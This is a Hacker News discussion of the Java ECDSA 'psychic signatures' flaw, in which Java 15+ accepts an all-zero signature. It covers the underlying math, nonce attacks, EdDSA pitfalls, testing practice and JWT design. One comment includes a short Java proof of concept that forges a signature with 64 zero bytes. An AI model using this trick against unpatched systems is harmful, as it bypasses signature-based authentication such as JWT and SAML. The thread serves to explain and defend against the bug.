[HN Gopher] Psychic Signatures in Java
___________________________________________________________________
Psychic Signatures in Java
Author : 19870213
Score : 120 points
Date : 2022-04-19 21:09 UTC (1 day ago)
(HTM) web link (neilmadden.blog)
(TXT) w3m dump (neilmadden.blog)
| pluc wrote:
| Not a good few months for Java
| tptacek wrote:
| This is probably the cryptography bug of the year. It's easy to
| exploit and bypasses signature verification on anything using
| ECDSA in Java, including SAML and JWT (if you're using ECDSA in
| either).
|
| The bug is simple: like a lot of number-theoretic asymmetric
| cryptography, the core of ECDSA is algebra on large numbers
| modulo some prime. Algebra in this setting works for the most
| part like the algebra you learned in 9th grade; in particular,
| zero times any algebraic expression is zero. An ECDSA signature
| is a pair of large numbers (r, s) (r is the x-coordinate of a
| randomly selected curve point based on the infamous ECDSA nonce;
| s is the signature proof that combines r, the nonce, the hash
| of the message, and the secret key). The bug is that Java 15+
| ECDSA accepts (0, 0).
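|
| A sketch of what exploitation looks like (this mirrors the demo
| in the linked post; names are just for illustration). On a
| vulnerable JDK 15-18 the last line prints "true"; on a patched
| build it prints "false" or throws:
|
|     import java.security.KeyPairGenerator;
|     import java.security.Signature;
|
|     public class PsychicSignature {
|         public static void main(String[] args) throws Exception {
|             var keys = KeyPairGenerator.getInstance("EC").generateKeyPair();
|             // 64 zero bytes encode (r, s) = (0, 0) in IEEE P1363 format
|             var blankSignature = new byte[64];
|             var sig = Signature.getInstance("SHA256withECDSAinP1363Format");
|             sig.initVerify(keys.getPublic());
|             sig.update("Hello, World".getBytes());
|             System.out.println(sig.verify(blankSignature));
|         }
|     }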
|
| For the same bug in a simpler setting, just consider finite field
| Diffie Hellman, where we agree on a generator G and a prime P,
| Alice's secret key is `a mod P` and her public key is `G^a mod
| P`; I do the same with B. Our shared secret is `A^b mod P` or
| `B^a mod P`. If Alice (or a MITM) sends 0 (or 0 mod P) in place
| of A, then they know what the result is regardless of anything
| else: it's zero. The same bug recurs in SRP (which is sort of a
| flavor of DH) and protocols like it (but much worse, because
| Alice is proving that she knows a key and has an incentive to
| send zero).
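|
| The toy version in code (tiny, purely illustrative numbers; the
| only point is that zero annihilates everything):
|
|     import java.math.BigInteger;
|
|     public class ZeroKeyDH {
|         public static void main(String[] args) {
|             BigInteger p = BigInteger.valueOf(23);  // public prime
|             BigInteger b = BigInteger.valueOf(15);  // Bob's secret exponent
|             BigInteger forgedA = BigInteger.ZERO;   // MITM sends 0 as "Alice's public key"
|             // Bob's "shared secret" A^b mod p is forced to 0, whatever b is
|             System.out.println(forgedA.modPow(b, p));
|         }
|     }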
|
| The math in ECDSA is more convoluted but not much more; the
| kernel of ECDSA signature verification is extracting the `r`
| embedded into `s` and comparing it to the presented `r`; if `r`
| and `s` are both zero, that comparison will always pass.
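|
| Spelled out, textbook ECDSA verification (z is the message hash,
| n the group order, G the base point, Q the public key) goes:
|
|     w = s^-1 mod n
|     u1 = z*w mod n,  u2 = r*w mod n
|     (x1, y1) = u1*G + u2*Q
|     accept iff x1 == r (mod n)
|
| If the mandatory range check 1 <= r, s <= n-1 is skipped and the
| arithmetic happily maps 0 to 0 at every step, then r = s = 0
| gives u1 = u2 = 0 and the final comparison collapses to 0 == 0.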
|
| It is much easier to mess up asymmetric cryptography than it is
| to mess up most conventional symmetric cryptography, which is a
| reason to avoid asymmetric cryptography when you don't absolutely
| need it. This is a devastating bug that probably affects a lot of
| different stuff. Thoughts and prayers to the Java ecosystem!
| DyslexicAtheist wrote:
| > Thoughts and prayers to the Java ecosystem!
|
| some very popular PKI systems (many CAs) are powered by Java
| and BouncyCastle ...
| nmadden wrote:
| BouncyCastle has its own implementation of ECDSA, and it's
| not vulnerable to this bug.
| na85 wrote:
| >infamous ECDSA nonce
|
| Why "infamous"?
| Dylan16807 wrote:
| I'm not particularly knowledgeable here, but I know it's
| extremely fragile, far beyond just needing to be unique. See
| "LadderLeak: Breaking ECDSA With Less Than One Bit of Nonce
| Leakage"
| SAI_Peregrinus wrote:
| It's more properly called 'k'. It's really a secret key, but
| it has to be unique per-signature. If an attacker can ever
| guess a single bit of the nonce with probability non-
| negligibly >50%, they can find the private key of whoever
| signed the message(s).
|
| It makes ECDSA _very_ brittle, and quite prone to side-
| channel attacks (since those can give attackers exactly such
| information).
| Mindless2112 wrote:
| There's an easy fix for that though -- generate k
| deterministically using the procedure in RFC6979 [1].
|
| [1]
| https://datatracker.ietf.org/doc/html/rfc6979#section-3.2
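|
| For illustration, a sketch of deterministic signing with
| BouncyCastle's low-level API (assumes BC is on the classpath;
| HMacDSAKCalculator is its RFC 6979 nonce derivation; class
| names here are just for the example):
|
|     import java.math.BigInteger;
|     import java.security.SecureRandom;
|     import org.bouncycastle.asn1.sec.SECNamedCurves;
|     import org.bouncycastle.asn1.x9.X9ECParameters;
|     import org.bouncycastle.crypto.AsymmetricCipherKeyPair;
|     import org.bouncycastle.crypto.digests.SHA256Digest;
|     import org.bouncycastle.crypto.generators.ECKeyPairGenerator;
|     import org.bouncycastle.crypto.params.ECDomainParameters;
|     import org.bouncycastle.crypto.params.ECKeyGenerationParameters;
|     import org.bouncycastle.crypto.signers.ECDSASigner;
|     import org.bouncycastle.crypto.signers.HMacDSAKCalculator;
|
|     public class Rfc6979Sketch {
|         public static void main(String[] args) {
|             X9ECParameters p256 = SECNamedCurves.getByName("secp256r1");
|             ECDomainParameters domain = new ECDomainParameters(
|                     p256.getCurve(), p256.getG(), p256.getN(), p256.getH());
|             ECKeyPairGenerator gen = new ECKeyPairGenerator();
|             gen.init(new ECKeyGenerationParameters(domain, new SecureRandom()));
|             AsymmetricCipherKeyPair keys = gen.generateKeyPair();
|
|             byte[] hash = new byte[32]; // in practice: SHA-256 of the message
|
|             // k is derived deterministically from the private key and the
|             // hash, so a weak RNG at signing time can no longer leak the key.
|             ECDSASigner signer = new ECDSASigner(
|                     new HMacDSAKCalculator(new SHA256Digest()));
|             signer.init(true, keys.getPrivate());
|             BigInteger[] rs = signer.generateSignature(hash);
|             System.out.println("r = " + rs[0].toString(16));
|             System.out.println("s = " + rs[1].toString(16));
|         }
|     }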
| drexlspivey wrote:
| That makes no sense, how can you get the private key from
| knowing 1 bit of the nonce?
| tptacek wrote:
| See, cryptography engineering is sinking in!
|
| Here you go:
|
| https://toadstyle.org/cryptopals/62.txt
|
| What's especially great about this is that it's very easy
| to accidentally have a biased nonce; in most other areas
| of cryptography, all you care about when generating
| random parameters is that they be sufficiently (ie, "128
| bit security worth") random. But with ECDSA, you need the
| entire domain of the k value to be random.
| drexlspivey wrote:
| Ok but for this scheme you need a large number of
| signatures from the same biased RNG which makes sense. I
| thought that the GP was suggesting that you can recover
| the key from one signature with just a few bits.
| na85 wrote:
| I guess like so:
|
| https://cryptopals.com/sets/8/challenges/62.txt
|
| E: Thomas beat me to it
| Zababa wrote:
| Thank you for that, that was a great explanation.
| loup-vaillant wrote:
| Interestingly, EdDSA (generally known as Ed25519) does not need
| as many checks as ECDSA, and assuming the public key is valid,
| an all-zero signature will be rejected by the main check alone.
| All you need to do is verify the following equation:
|
| _R = SB - Hash(R || A || M) A_
|
| Where _R_ and _S_ are the two halves of the signature, _A_ is
| the public key, and _M_ is the message (and _B_ is the curve's
| base point). If the signature is zero, the equation reduces to
| _Hash(R || A || M)A = 0_, which is always false with a
| legitimate public key.
|
| And indeed, TweetNaCl does not explicitly check that the
| signature is not zero. It doesn't need to.
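|
| You can see that claim directly from the JDK side too (JDK 15+
| ships Ed25519; in this sketch an all-zero 64-byte signature
| should simply fail to verify):
|
|     import java.security.KeyPairGenerator;
|     import java.security.Signature;
|
|     public class ZeroEd25519 {
|         public static void main(String[] args) throws Exception {
|             var keys = KeyPairGenerator.getInstance("Ed25519").generateKeyPair();
|             var sig = Signature.getInstance("Ed25519");
|             sig.initVerify(keys.getPublic());
|             sig.update("test".getBytes());
|             // 64 zero bytes: R = 0 and S = 0. The verification equation
|             // cannot hold for a legitimate public key, so this prints false.
|             System.out.println(sig.verify(new byte[64]));
|         }
|     }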
|
| _However._
|
| There are still ways to be clever and shoot ourselves in the
| foot. In particular, there's the temptation to convert the
| Edwards point to Montgomery, perform the scalar multiplication
| there, then convert back (doubles the code's speed compared to
| a naive ladder). Unfortunately, doing that introduces edge
| cases that weren't there before, that cause the point we get
| back to be invalid. So invalid in fact that adding it to
| another point gives us zero half the time or so, causing the
| verification to succeed even though it should have failed!
|
| _(Pro tip: don't bother with that conversion, variable time
| double scalarmult https://loup-vaillant.fr/tutorials/fast-scalarmult
| is even faster.)_
|
| A pretty subtle error, though with eerily similar consequences.
| It _looked_ like a beginner-nuclear-boyscout error, but my only
| negligence there was messing with maths I only partially
| understood. (A pretty big no-no, but I have learned my lesson
| since.)
|
| Now if someone could contact the Wycheproof team and get them
| to fix their front page so people know they have EdDSA test
| vectors, that would be great.
| https://github.com/google/wycheproof/pull/79 If I had known
| about those, the whole debacle could have been avoided. Heck, I
| bet my hat their ECDSA test vectors could have avoided the
| present Java vulnerability. They need to be advertised better.
| ptx wrote:
| Apparently you have to get a new CPU to fix this Java
| vulnerability, or alternatively a new PSU.
|
| (That is to say: a _Critical Patch Update_ or a _Patch Set
| Update_. Did they really have to overload these TLAs?)
| lobstey wrote:
| Not that a lot of companies are using Java 15+. People
| generally stick to 8 or 11.
| needusername wrote:
| I believe Oracle 11 is affected.
| cesarb wrote:
| And once again, you'd be saved if you stayed on an older release.
| This is the third time this has happened recently in the Java
| world: the Spring4Shell vulnerability only applies to Java 9 and
| later (that vulnerability depends on the existence of a method
| introduced by Java 9, since all older methods were properly
| blacklisted by Spring), and the Log4Shell vulnerability only
| applies to log4j 2.x (so if you stayed with log4j 1.x, and didn't
| explicitly configure it to use a vulnerable appender, you were
| safe). What's going on with Java?
| KronisLV wrote:
| > ...the Log4Shell vulnerability only applies to log4j 2.x (so
| if you stayed with log4j 1.x, and didn't explicitly configure
| it to use a vulnerable appender, you were safe)
|
| Seems like someone likes to live dangerously: using libraries
| that haven't been updated since 2012 is a pretty risky move,
| especially given that if an RCE is discovered now, you'll find
| yourself without too many options to address it, short of
| migrating over to the new release (which will be worse than
| having to patch a single dependency in a backwards compatible
| manner): https://logging.apache.org/log4j/1.2/changes-report.html
|
| Admittedly, i wrote a blog post called "Never update anything"
| a while back, even if in a slightly absurdist manner:
| https://blog.kronis.dev/articles/never-update-anything and
| personally think that frequent updates are a pain to deal with,
| but personally i'd only advocate for using stable/infrequently
| updated pieces of software if they're still supported in one
| way or another.
|
| You do bring up a nice point about the recent influx of
| vulnerabilities and problems in the Java ecosystem, which i
| believe is caused by the fact that they're moving ahead at a
| faster pace and are attempting to introduce new language
| features to stay relevant and make the language more inviting
| for more developers.
|
| That said, with how many GitHub outages there have been in the
| past year and how many other pieces of software/services have
| broken in a variety of ways, i feel like chasing after a more
| rapid pace of changes and breaking things in the process is an
| industry wide problem.
| yardstick wrote:
| > using libraries that haven't been updated since 2012 is a
| pretty risky move
|
| I disagree. Some libraries are just rock solid, well tested,
| and long-lived.
|
| In the case of log4j 1.x vs 2.x, has there been any real
| motivator to upgrade? There are 2 well known documented
| vulnerabilities in 1.x that only apply if you use extensions.
| KronisLV wrote:
| A sibling comment mentions the reload4j project, so clearly
| someone thought that 1.x wasn't adequate, to the degree of
| creating a new project around maintaining a fork. Can't
| speak of the project itself, merely the fact that its
| existence supports the idea that EOL software is something
| that people would prefer to avoid, even if they decide to
| maintain a backwards compatible fork themselves, which is
| great to see.
|
| Here's a bit more information about some of the
| vulnerabilities in 1.x, someone did a nice writeup about
| it: https://www.petefreitag.com/item/926.cfm
|
| I've also dealt with 1.x having some issues with data loss,
| for example, https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4...
| which is unlikely to get fixed:
| DailyRollingFileAppender has been observed to exhibit
| synchronization issues and data loss.
|
| (though at least in regards to that problem, there are
| alternatives; though for the most part EOL software implies
| that no further fixes will be available)
|
| But at the end of the day none of it really matters: those
| who don't want to upgrade won't do so, potential issues
| down the road (or even current ones that they're not aware
| of) be damned. Similarly, others might have unpatched
| versions of 2.x running somewhere which somehow haven't
| been targeted by automated attacks (yet) and might continue
| to do so while there isn't proper motivation to upgrade, or
| won't do so until it's too late.
|
| Personally, i dislike the idea of using abandoned software
| for the most part, when i just want to get things done - i
| don't have the time to dance around old documentation, dead
| links, having to figure out workarounds for CVEs versus
| just using the latest (stable) versions and letting someone
| else worry about it all down the road. Why take on an
| additional liability, when most modern tooling and
| framework integrations (e.g. Spring Boot) will be built
| around the new stuff anyways? Though thankfully in regards
| to this particular case slf4j gives you more flexibility,
| but in general i'd prefer to use supported versions of
| software.
|
| I say that as someone who actually migrated a bunch of old
| monolithic Spring (not Boot) apps to something more modern
| when the versions had been EOL for a few years and there
| were over a hundred CVEs as indicated by automated
| dependency/package scanning. It took months to do, because
| previously nobody actually cared to constantly follow the
| new releases and thus it was more akin to a rewrite rather
| than an update - absolute pain, especially since the JDK 8 to 11
| migration was also tacked on, as was containerizing the app
| due to environmental inconsistencies growing throughout the
| years to the point where the app would roll over and die
| and nobody had any idea why (ahh, the joys of working with
| monoliths, where even logs, JMX and heap dumps don't help
| you).
|
| Of course, after untangling that mess, i'd like to suggest
| that you should not only constantly update packages (think
| every week, alongside releases; you should also release
| often) but also keep the surface area of any individual
| service small enough that they can be easily
| replaced/rewritten. Anyways, i'm going off on a tangent
| here about the greater implications of using EOL stuff long
| term, but those are my opinions and i simultaneously do
| admit that there are exceptions to that approach and
| circumstances vary, of course.
| cesarb wrote:
| > especially given that if an RCE is discovered now, you'll
| find yourself without too many options to address it, short
| of migrating over to the new release
|
| Luckily, there's now an alternative: reload4j
| (https://reload4j.qos.ch/) is a maintained fork of log4j 1.x,
| so if you were one of the many who stayed on the older log4j
| 1.x (and there were enough of them that there was sufficient
| demand for that fork to be created), you can just migrate to
| that fork (which is AFAIK fully backward compatible).
|
| (And if you do want to migrate away from log4j 1.x, you don't
| need to migrate to log4j 2.x; you could also migrate to
| something else like logback.)
| ragnese wrote:
| Was Spring4Shell Java's fault, or Spring's fault? Log4Shell was
| obviously (mostly) log4j's fault.
|
| This one, I gather, is actually Java's fault.
|
| It sounds like three unrelated security bugs from totally
| different teams of developers.
| brazzy wrote:
| I think the other two are considered "Java's fault" because
| the frameworks they occurred in are so pervasive in the Java
| ecosystem that you might as well consider them part of the
| standard library.
| jatone wrote:
| _gasp_ new code can introduce bugs... whatever will one do?!
| taeric wrote:
| You make this sound like it is unique to java. I remember
| Heartbleed was similar, in that the LTS I was on did not have
| the vulnerable library.
|
| At some level, as long as releases add functionality, the basic
| rules of systemantics will guarantee unintended interactions.
| ccbccccbbcccbb wrote:
| Q: Which type of cryptography is implied to be unsafe in the
| following sentence?:
|
| "Immediately ditch RSA in favor of EC, for it is too hard to
| implement safely!"
| tedunangst wrote:
| What's Java's RSA history look like?
| RandomBK wrote:
| Does anyone know why this was only given a CVSS score of 7.5?
| Based on the description this sounds way worse, but Oracle only
| gave it a CVSS Confidentiality Score of "None", which doesn't
| sound right. Is there some mitigating factor that hasn't been
| discussed?
|
| In terms of OpenJDK 17 (latest LTS), the issue is patched in
| 17.0.3, which was released ~12h ago. Note that official OpenJDK
| docker images are still on 17.0.2 at the time of writing.
| tptacek wrote:
| CVSS is a completely meaningless Ouija board that says whatever
| the person authoring the score wants it to say.
| m00dy wrote:
| I thought Java disappeared in the previous ice age.
| 0des wrote:
| I want to live in this world, but no.
| [deleted]
| bertman wrote:
| The fix for OpenJDK (authored on Jan. 4th 22):
|
| https://github.com/openjdk/jdk/blob/e2f8ce9c3ff4518e070960ba...
| sdhfkjwefs wrote:
| Why are there no tests?
| drexlspivey wrote:
| with commit message "Improve ECDSA signature support" :D
| tialaramex wrote:
| This is the sort of dumb mistake that ought to get caught by unit
| testing. A junior, assigned the task of testing this feature,
| ought to see that the cryptographic signature design requires
| these values to be nonzero, try setting them to zero, and...
| watch it burn to the ground.
|
| Except that, of course, people don't actually do unit testing,
| they're too busy.
|
| Somebody is probably going to mention fuzz testing. But, if
| you're "too busy" to even write the unit tests for the software
| you're about to replace, you aren't going to fuzz test it are
| you?
| tptacek wrote:
| The point of fuzz testing is not having to think of test cases
| in the first place.
| kasey_junk wrote:
| This is true in principle but in practice most fuzz testing
| frameworks demand a fair bit of setup. It's worth it!
|
| But if you are in a time constrained environment where basic
| unit tests are skipped fuzz testing will be as well.
| loup-vaillant wrote:
| You still need your tests to cover all possible errors (or at
| least all _plausible_ errors). If you try random numbers and
| your prime happens to be close to a power of two, evenly
| distributed random numbers won't end up outside the [0,n-1]
| range you are supposed to validate. Even if your prime is far
| enough from a power of two, you still won't hit zero by
| chance (and you need to test zero, because you almost
| certainly need two separate pieces of code to reject the =0
| and >=n cases).
|
| Another example is Poly1305. When you look at the test
| vectors from RFC 8439, you notice that some are specially
| crafted to trigger overflows that random tests wouldn't
| stumble upon.
|
| Thus, I would argue that proper testing requires some domain
| knowledge. Naive fuzz testing is bloody effective but it's
| not enough.
| cliftonk wrote:
| That's all true, but fuzz testing is very effective at
| checking boundary conditions (near 0, near max/mins) and
| would have caught this particular problem easily.
| loup-vaillant wrote:
| Do you mean fuzz testing does _not_ use even
| distributions? There's a bias towards extrema, or at
| least some guarantee to test zero and MAX? I guess that
| would work.
|
| Also, would you consider the following to be fuzz
| testing? https://github.com/LoupVaillant/Monocypher/blob/master/tests...
| tialaramex wrote:
| [Somebody had down-voted you when I saw this, but it wasn't
| me]
|
| These aren't alternatives, they're complementary. I
| appreciate that fuzz testing makes sense over writing unit
| tests for weird edge cases, but "these parameters can't be
| zero" isn't an edge case, it's part of the basic design.
| Here's an example of what X9.62 says:
|
| > If r' is not an integer in the interval [1, n-1], then
| reject the signature.
|
| Let's write a unit test to check, say, zero here. Can we also
| use fuzz testing? Sure, why not. But lines like this ought to
| _scream out_ for a unit test.
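|
| Something like this, say with JUnit 5 (a sketch; on a correct
| implementation verify() must either return false or throw, never
| return true):
|
|     import static org.junit.jupiter.api.Assertions.assertFalse;
|
|     import java.security.KeyPairGenerator;
|     import java.security.Signature;
|     import java.security.SignatureException;
|     import org.junit.jupiter.api.Test;
|
|     class EcdsaRangeCheckTest {
|         @Test
|         void rejectsAllZeroSignature() throws Exception {
|             var keys = KeyPairGenerator.getInstance("EC").generateKeyPair();
|             var sig = Signature.getInstance("SHA256withECDSAinP1363Format");
|             sig.initVerify(keys.getPublic());
|             sig.update("arbitrary message".getBytes());
|
|             byte[] allZero = new byte[64]; // (r, s) = (0, 0), outside [1, n-1]
|             boolean accepted;
|             try {
|                 accepted = sig.verify(allZero);
|             } catch (SignatureException e) {
|                 accepted = false; // rejecting with an exception is also fine
|             }
|             assertFalse(accepted);
|         }
|     }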
| tptacek wrote:
| Right, I'm just saying: there's a logic that says fuzz
| tests are easier than specific test-cases: the people that
| run the fuzz tests barely need to understand the code at
| all, just the basic interface for verifying a signature.
| solarengineer wrote:
| If we write an automated test case for known acceptance
| criteria, and then write necessary and sufficient code to get
| those tests to pass, we would know what known acceptance
| criteria are being fulfilled. When someone else adds to the
| code and causes a test to fail, the test case and the
| specific acceptance criteria would thus help the developer
| understand intended behaviour (verify behaviour, review
| implementation). Thus, the test suite would become a
| catalogue of programmatically verifiable acceptance criteria.
|
| Certainly, fuzz tests would help us test boundary conditions
| and more, but they are not a catalogue of known acceptance
| criteria.
| anfilt wrote:
| While fuzz testing is good and all, when it comes to
| cryptography the input space is so large that the chances of
| finding something are even worse than finding a needle in a
| haystack.
|
| For instance, here the keys are going to be around 256 bits
| in size, so if your fuzzer is just picking keys at random,
| you're basically never going to hit zero by chance.
|
| With cryptographic primitives you really should be testing
| all known invalid input parameters for the particular
| algorithm. A random fuzzer is not going to know that.
| Additionally, you should be testing that inputs which can
| cause overflows are handled correctly, etc.
| hsbauauvhabzb wrote:
| The issue is the assumption that juniors should be writing the
| unit tests; sounds like you might be part of the problem.
| tialaramex wrote:
| I think I probably technically count as a junior in my
| current role, which is very amusing and "I don't write enough
| unit tests" was one of the things I wrote in the self-
| assessed annual review.
|
| So, sure.
| [deleted]
| LaputanMachine wrote:
| >Just a basic cryptographic risk management principle that
| cryptography people get mad at me for saying (because it's true)
| is: don't use asymmetric cryptography unless you absolutely need
| it.
|
| Is there any truth to this? Doesn't basically all Internet
| traffic rely on the security of (correctly implemented)
| asymmetric cryptography?
| fabian2k wrote:
| I've seen this argument often on the topic of JWTs, which are
| also mentioned in the tweets here. In many situations there are
| simpler methods than JWTs that don't require any cryptography,
| e.g. simply storing session ids server-side. With these simple
| methods there isn't anything cryptographic that could break or
| be misused.
|
| The TLS encryption is of course assumed here, but that is
| nothing most developers ever really touch in a way that could
| break it. And arguably this part falls under the "you
| absolutely need it" exception.
| jaywalk wrote:
| Server-side session storage isn't necessarily a replacement
| for JWTs. It can be in many cases, but it's not one-to-one.
| JWTs do have advantages.
| fabian2k wrote:
| That's why I wrote "in many cases". The problem is more
| that for a while at least JWT were pretty much sold as the
| new and shiny replacement for classic sessions, which
| they're not. They absolutely have their uses, but they also
| have additional attack surface.
| [deleted]
| slaymaker1907 wrote:
| You can still use symmetric cryptography with JWTs. I believe
| HS256 is just an HMAC with SHA-256 under a symmetric key. If
| you go beyond JWT, Kerberos only uses symmetric
| cryptography while not being as centralized as other
| solutions. Obviously, the domain controller is centralized,
| but it allows for various services to use common
| authentication without compromising the whole domain if any
| one service is compromised (assuming correct configuration
| which is admittedly difficult with Kerberos).
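|
| For concreteness, HS256 boils down to this (a bare-bones sketch
| with no JWT library; the header and payload JSON are made up):
|
|     import java.nio.charset.StandardCharsets;
|     import java.util.Base64;
|     import javax.crypto.Mac;
|     import javax.crypto.spec.SecretKeySpec;
|
|     public class Hs256Sketch {
|         public static void main(String[] args) throws Exception {
|             var enc = Base64.getUrlEncoder().withoutPadding();
|             String header = enc.encodeToString(
|                     "{\"alg\":\"HS256\",\"typ\":\"JWT\"}".getBytes(StandardCharsets.UTF_8));
|             String payload = enc.encodeToString(
|                     "{\"sub\":\"alice\"}".getBytes(StandardCharsets.UTF_8));
|
|             byte[] sharedSecret = "use-a-real-random-256-bit-key".getBytes(StandardCharsets.UTF_8);
|             Mac mac = Mac.getInstance("HmacSHA256");
|             mac.init(new SecretKeySpec(sharedSecret, "HmacSHA256"));
|             // The JWT "signature" is just HMAC-SHA256 over "header.payload"
|             byte[] tag = mac.doFinal(
|                     (header + "." + payload).getBytes(StandardCharsets.US_ASCII));
|
|             System.out.println(header + "." + payload + "." + enc.encodeToString(tag));
|         }
|     }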
| er4hn wrote:
| The biggest problem with JWTs is not what cryptography you
| use (though there was a long-standing issue where "none" was
| something that clients could enter as a client-side
| attack...) but rather revocation.
|
| x509 certificates have several revocation mechanisms since
| having something marked as "do not use" before the end
| of its lifetime is well understood. JWTs are not quite there.
| codebje wrote:
| JWT is just a container for authenticated data. It's
| comparable to the ASN.1 encoding of an x509 certificate,
| not to the entire x509 public key infrastructure.
|
| You could compare x509 with revocation to something like
| oauth with JWT access tokens, though.
|
| In that case, x509 certificates are typically expensive to
| renew and have lifetimes measured in years. Revocation
| involves clients checking a revocation service. JWT access
| tokens are cheap to renew and have lifetimes measured in
| minutes. Revocation involves denying a refresh token when
| the access token needs renewing. Clients can also choose to
| renew access tokens much more frequently if a 'revocation
| server' experience is desirable.
|
| Given the spotty history of CRLDP reliability, I think
| oauth+JWT are doing very well in comparison. I'm pretty
| damn confident that when I revoke an application in Google
| or similar it will lose access very quickly.
| lazide wrote:
| Initial connection negotiation and key exchange does, anything
| after that no. It will use some kind of symmetric algo
| (generally AES).
|
| It's a bad idea (and no one should be doing it) to continue
| using asymmetric crypto algorithms after that. If you can get
| away with a pre-shared (symmetric) key, that's sometimes/usually
| even better, depending on the risk profile.
| formerly_proven wrote:
| I wouldn't be particularly worried about someone decrypting a
| file encrypted in the 80s using Triple DES anytime soon. I
| don't think I'll live to see AES being broken.
|
| I wouldn't bet on the TLS session you're using having that
| kind of half-life.
| smegsicle wrote:
| if people were getting mad at him, he must have been pretty
| obnoxious about it because i don't think there's much
| controversy: asymmetric encryption is pretty much just used for
| things like sharing the symmetric key that will be used for the
| rest of the session
|
| of course it would be more secure to have private physical key
| exchange, but that's not a practical option, so we rely on RSA
| or whatever
| nicoburns wrote:
| > Is there any truth to this?
|
| Yes, symmetric cryptography is a lot more straightforward and
| should be preferred where it is easy to use a shared secret.
|
| > Doesn't basically all Internet traffic rely on the security
| of (correctly implemented) asymmetric cryptography?
|
| It does. This would come under the "unless you absolutely need
| it" exception.
| lobstey wrote:
| I doubt many companies are actually using Java 15+. Many still
| stick to 8 or 11.
___________________________________________________________________
(page generated 2022-04-20 23:00 UTC)